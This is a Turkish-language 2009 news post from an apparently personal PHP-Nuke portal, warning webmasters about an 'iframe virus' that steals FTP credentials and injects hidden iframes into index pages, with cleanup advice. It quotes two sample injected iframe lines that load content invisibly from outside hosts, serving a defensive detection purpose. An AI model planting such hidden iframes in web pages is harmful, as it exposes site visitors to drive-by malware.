- PHP Nuke ile İlgili Görüş, Öneri ve İsteklerinizi Lütfen DiÄŸer Sitemize Yapınız...       - PHP Nuke ArÅŸiv Sitemiz Yenilenmektedir. Ana Sitemizde Bulunan PHP Nuke İle İlgili Bölümler ve Dosyalar ArÅŸiv Sitemize Taşınmıştır...      
Ana Sayfa
  Ana Sayfa | Haberler | Dosyalar | Sunumlar | Forum | Ä°letiÅŸim Açılış Sayfası Yap  Sık kullanılanlara Ekle  Ä°letiÅŸim  Arkadaşınıza Önerin
 
 
  Ana Sayfa
  Haberlerimiz
  Haber BaÅŸlıkları
  Köşe Yazıları
  Üyelik
  Åžiirler
  Videolarımız
  Resim Galerimiz
  Tarihte Bugün
  Atatürk
  Nutuk
  A-Z Bilgisayar
  Sivil Savunma
  Atasözlerimiz
  Gif ArÅŸivi
  Rüya Tabirleri
  Burçlar
  EÄŸlence
  Testler
  MSN
  Rehberlik
  Bize Yazın
  Forum
  Ziyaretçi Defteri
  Dilek Kutusu
  Anketler
  E-Devlet
  Oyunlar
  Fıkralar
  Flashlar
  Google Map
  Sunumlar
  Tüm Dosyalar
  Dosyalar
  PHP İpucu   Künye
 
 
  Kullanıcı GiriÅŸi
 Â» Üye Adı
 Â» Åžifreniz
 Â» Üye Ol
Ziyaretçi: 21
Üye: 0
Toplam: 21
Toplam Uye: 16675
 Son Üye:  bendenizme..
 
 
Pazartesi527
Salı416
Çarşamba323
PerÅŸembe331
Cuma317
Cumartesi308
Pazar311
Toplam:151346
En Çok:2461
 
   Yazarlarımız 
 
Yılmaz Öğretmen
Yılmaz Öğretmen
Yılmaz Öğretmen
Yılmaz Öğretmen
 
    ANKET
 
Hangi İşletim Sistemini Kullanıyosunuz?

Win XP
Win Vista
Win 7
Linux
DiÄŸer



Sonuçlar
Anketler

Toplam Oy: 181
Yorum: 0
 
 
  *  MEB
*  MEBBİS
*  OSYM
*  TC No Sorgulama
*  Emekli Sandığı
Yemek Tarifleri *
Milli Piyango Sonuçları *
Askerlik İşlemleri *
Memurlar.Net *
ADSL Kota Öğrenme *
TTNet A.Åž. *
 
   REKLAM   Gazeteler
 

 
 
  Bilisim: Web Sitelerinden İframe Virüsü Yayılıyor
Tarih: 03.09.2009 Saat: 14:46 Gönderen: yilmazogretmen
 
 
  Bilisim Bir çok web sitesinde bazı virüs pogramlarının tesbit ettiÄŸi iframe virüsü bulaÅŸmış durumdadır.Bu sebepten dolayı google bir çok web sitesini güvenlik nedeniyle engellemektedir...

İnternet ortamında gittikçe yaygınlaÅŸan iframe denilen bir virüs sitelerin baÅŸ belası oluyor. Bu virüs hostunuza bulaÅŸabilir. Bu virüs bir çok web sahibinin sorunu olmuÅŸ durumdadır.
 
Virüs hostinge bulaÅŸtığında index.asp, index.php, default.asp gibi ana sayfa düzenine yerleÅŸtirdiÄŸi kodlar sayesinde siteyi yönlendirebilmektedir. Aynı zamanda diÄŸer bütün klasörlerin içinde bulunan index.php, index.html, index.htm, default.asp dosyalarının içine yerleÅŸiyor. Bu virüs cuteftp, Blazeftp, Filezilla  vb bazı programların crack yada keygen programlarından bulaÅŸmakta yada daha evvel bulaÅŸan sitelere girilmesinden dolayı antivirüs programı olmayan bilgisayarlara bulaÅŸmaktadır. Program girdiÄŸiniz bütün ftp'lere girmeye baÅŸlar..


Bir çok antivirüs programında henüz tam anlamıyla görüntülenmeyen virüs avast gibi antivirüs programlarında net olarak tespit edilebilmektedir.


Bu virüs bir kere bilgisayarınıza bulaÅŸtıkdan sonra o bilgisayarla hangi sitenin ftp'ini açarsanız açın girdiÄŸiniz ftp bilgilerini kaydederek, sitelere girip index.php , index.html , index.htm , default.asp 'nin içlerine iframe kodu atiyor. Atılan iframe kodları ÅŸu ÅŸekilde olmaktadır.


<--iframe src http://b6l.ru:8080/index.php width 649 height 135 style visibility: hidden>/iframe-->
 
<--iframe src=http://81.95.145.240/logo/index.php style=border:0px solid gray WIDTH=0 HEIGHT=0
FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no>


Bu adresler deÄŸiÅŸiklik gösterebilir.


Peki Virüs Sizin Bilgisayarınıza BulaÅŸtı ve bunun farkına vardınız ne yapmamız gerekir ?


Sadece ftp bilgilerinizi alabildiÄŸi için hemen dosyalarınızı pc'ye atıp içindeki iframe kodlarını silin ve tekrar ftp'den upload edin. Sonra hiç vakit kaybetmeden kullandığınız cpanel/plesk panelinize girin ve ÅŸifrenizi deÄŸiÅŸtirin.


Bu iÅŸlemleri yaptıktan sonra sakın ftp'den giriÅŸ yapmayın. Çünkü ftp'den giriÅŸ yaptığınızda deÄŸiÅŸtirdiÄŸiniz ÅŸifreyide alarak tekrar dosyalarıza iframe atmaya baÅŸlayacaktır..
Bu iÅŸlemleride yaptıktan sonra virüs taraması yaparak bilgisayarınızı temizleyin. virüsün temizlenmediÄŸini düÅŸünüyorsanız bilgisayarınıza format atabilirsiniz..


***


Herhangi bir web sayfanızdan virüs önce bilgisayarınıza sızıyor ve daha sonra FTP benzeri program ile sitenize bulaşıyor. Haliyle bu ÅŸekilde her yere yayılmaya baÅŸlıyor. Virüs bi süre sonra masaüstünüze update.exe diye bi virüs ekleyip pc'ye zarar vermeye baÅŸlıyormuÅŸ.


Çözüm için ne yapabiliriz?
Öncelikle bilgisayarınızda dosya bulma menüsünden cd Win.Agent.pz(ntos.exe) bulduÄŸunuzda hemen silin. Daha sonra antitrojan ve antivirüsler ile bilgisayarınızı tarayın. Bu iÅŸlemlerden sonra FTP'yi kullanıp dosyaları kontrol edin.


DiÄŸer bir alternatif olarak;
Sitenizde bulunan dosyaları FTP yoluyla bilgisayarınıza indirip belirtilen iframe kodlarının olup olmadığını kontrol kontrol ederek virüs taramasından geçirin. Güvende olduÄŸunuzu hissediyorsanız Daha sonra dosyaları FTP'den tekrar sitenize atın. Yada Cute FTP kullanıyorsanız Ctrl-F kısayılu ile arama menüsünü açarak sitenizte 81.95.145.240 ip numarasını arayın.


İframe virüsünün bulaÅŸtığı dosyalarda yukarıdaki kırmızı olarak yazılmış satırlara benzer kodlar bulunur. Bu kod genelde sayfanın en sonunda olur. Kodu tamamen silip kaydetmeniz yeterli olacaktır. Ama eÄŸer bilgisayarınızda bir antivirüs yoksa birini yükleyip tarama yaptırın...

(Bu Yazı İnternetten Derlenmiştir)

 
Seçenekler
Arkadaşına Gönder Yazıcı Dostu Yorum Gönder
İlgili Konular


Henüz Yorum Eklenmemiş

Kategori: Bilisim

 
Ana Sayfa | Dosyalar | Sunumlar | Forumlar | Haberler | Ä°letiÅŸim |  Haber Bandı  
 

Sitemiz PHPNuke alt yapısı kullanılarak tarafımızca hazırlanmıştır. Her hakkı saklıdır.
1024x768 pixsel görüntü boyutuna göre düzenlenmiştir.
WebMaster: Yılmaz Öğretmen © 2011
EÄŸitimin Sesi  PHP-Nuke Resmi Sitesi